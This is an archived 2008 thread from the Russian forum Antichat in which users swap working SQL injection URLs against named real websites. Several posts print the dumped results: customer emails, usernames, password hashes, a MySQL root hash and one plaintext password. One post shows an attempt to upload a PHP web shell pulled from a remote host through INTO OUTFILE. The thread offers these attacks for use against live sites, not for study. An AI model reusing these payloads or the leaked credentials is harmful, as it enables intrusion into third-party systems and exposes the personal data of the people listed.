ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #6261  
Старый 10.08.2008, 13:20
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.norma.com.ua/main_description.php?newsletters_id=1'+union+selec t+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCA T(customers_email_address,0x3a3a,customers_passwor d)+FROM+customers+limit+32,1)),0x71),0x71),4,5,6/*

Походу опять многократный хеш....
 

  #6262  
Старый 10.08.2008, 14:02
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

Код:
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/*
Помогите плиз незнаю что дальше делать я просто только начинаю все осваивать и несовсем получается.

Последний раз редактировалось S0ulVortex; 10.08.2008 в 14:28..
 

  #6263  
Старый 10.08.2008, 14:33
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию

S0ulVortex вопросы по уязвимостям не сюда,дальше либо брут(если четвертая),либо вывод таблиц (если пятая) на сайте есть отличный фак! Читай!
 

  #6264  
Старый 10.08.2008, 15:09
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
Сообщение от S0ulVortex  
Код:
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/*
Помогите плиз незнаю что дальше делать я просто только начинаю все осваивать и несовсем получается.


вот, просмотрел немного бд.
Version: 5.0.45-log
User: u13238@10.10.223.207
Database name: u13238
Database name: u13238_2
Database name: u13238_3

и кончилось терпение))

Цитата:
u13238.users
Цитата:
id:login:PASSWORD:fullname:email

3:v87zmi39:$1$8H$WcE80yjcg7U6/lAyfPhc80:Константин:admin@shifr.com
11din:$1$E8$LTHwBBzaSQuFt2urqBkF5.:Андрей Ганзевичdin@2upost.com
9:v650mdr5:$1$QJ$1ULsLd3yP3jemXdo7l7Kt.:Андре й Сидоров:shop@vozmi.ru
 

  #6265  
Старый 10.08.2008, 15:09
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://koshhejjka.sirenes.ru/index.php?d=22&p=-1+union+select+concat(name,0x3a3a,e_mail,0x3a3a,pa ss),2,3,4+from+tbl_artist+limit+1,10/*

Косяковые гловы....
login: webmaster@avoska.com
pass: jxtymcnhfiyjtrbyj
 

  #6266  
Старый 10.08.2008, 15:14
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776

Репутация: 93
По умолчанию

http://perekrestok.ca/

http://perekrestok.ca/?page=countries&country_id=-1+union+select+1,2,unhex(hex(concat(login,0x3,pass word,0x3,email,0x3,icq))),4,5,6,7+from+users+limit +0,0--

4.1.20inetlaba_perek@localhostinetlaba_perek

Adminvan1238admin@torgprom.com.ua111
Superadminvfhbzuelbyfinfo@integra-isc.com
gendolfvfhbzuelbyfgendolff@yahoo.ca
 

  #6267  
Старый 10.08.2008, 19:49
-=Static=-
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме:
347573

Репутация: 185
По умолчанию

Цитата:
Сообщение от $n@ke  
вот, просмотрел немного бд.
Version: 5.0.45-log
User: u13238@10.10.223.207
Database name: u13238
Database name: u13238_2
Database name: u13238_3

и кончилось терпение))

На этой же базе висит сайт:
http://vozmi.ru
ТИЦ: 130
PR: 4

Код:
http://vozmi.ru/furniture/catalog.php?catalog=-97+union+select+user(),2,3/*
 

  #6268  
Старый 10.08.2008, 21:48
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

http://www.results.cec.gov.ge/ubnebi.php?district=22+and+1=@@version--

Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
 

  #6269  
Старый 10.08.2008, 23:27
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Цитата:
http://www.fofg.org/act/act_petition.php?pid=-1+union+select+1,2,3,4,5,6,7/*
version:4 =\
*******************
Цитата:
http://www.nationmultimedia.com/qvote/view_poll.php?page=13&pid=-239+union+select+1,convert(version()+using+latin1) ,3
version:4=\
*******************
Цитата:
http://www.cetim.ch/fr/publications_details.php?pid=-115+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5/*
Version:5.0.45-log3
user:cetimweb@imu129.infomaniak.ch3
Цитата:
http://www.cetim.ch/fr/publications_details.php?pid=-115+union+select+1,table_name,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5+from+information_schema. tables+limit+18,10/*
ничего интересного - сайт носит информационный характер
---------------------------------------------------------------------
Цитата:
http://www.solfocus.com/product.php?pid=-4+union+select+1,versio(),3,4,5,6,7,8/
*
User:root@localhost
Version:5
Цитата:
http://www.solfocus.com/product.php?pid=-4+union+select+1,table_name,3,4,5,6,7,8+from+infor mation_schema.tables+limit+18,10/*
Есть таблица db,копия mysql.user
Цитата:
http://www.solfocus.com/product.php?pid=-4+union+select+1,concat_ws(0x3a,user,password),3,4 ,5,6,7,8+from+mysql.user/*
root:*2F69143FB5C4B18522CA1EC561E137AB9D3F9170
Не могу залить шелл,расскажете если кто-то зальет)
а то я и так делал:
Цитата:
http://www.solfocus.com/product.php?pid=-4+union+select+1,<? @include("http://*****.narod.ru/shell.txt"); ?>,3,4,5,6,7,8+from+mysql.user+into+outfile+'C:\In etpub\phproot\hex.php'/
и в HEX фигачил,все равно не помогло =(

Последний раз редактировалось DDoSька; 10.08.2008 в 23:55..
 

  #6270  
Старый 10.08.2008, 23:54
Zircool
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
Провел на форуме:
519496

Репутация: 78
Отправить сообщение для Zircool с помощью ICQ
По умолчанию

http://www.fergusonhill.co.uk/

Цитата:
http://www.fergusonhill.co.uk/product_details.php?id=7+union+select+1,2,3,4,5,6, 7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*

Последний раз редактировалось Zircool; 11.08.2008 в 18:16..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ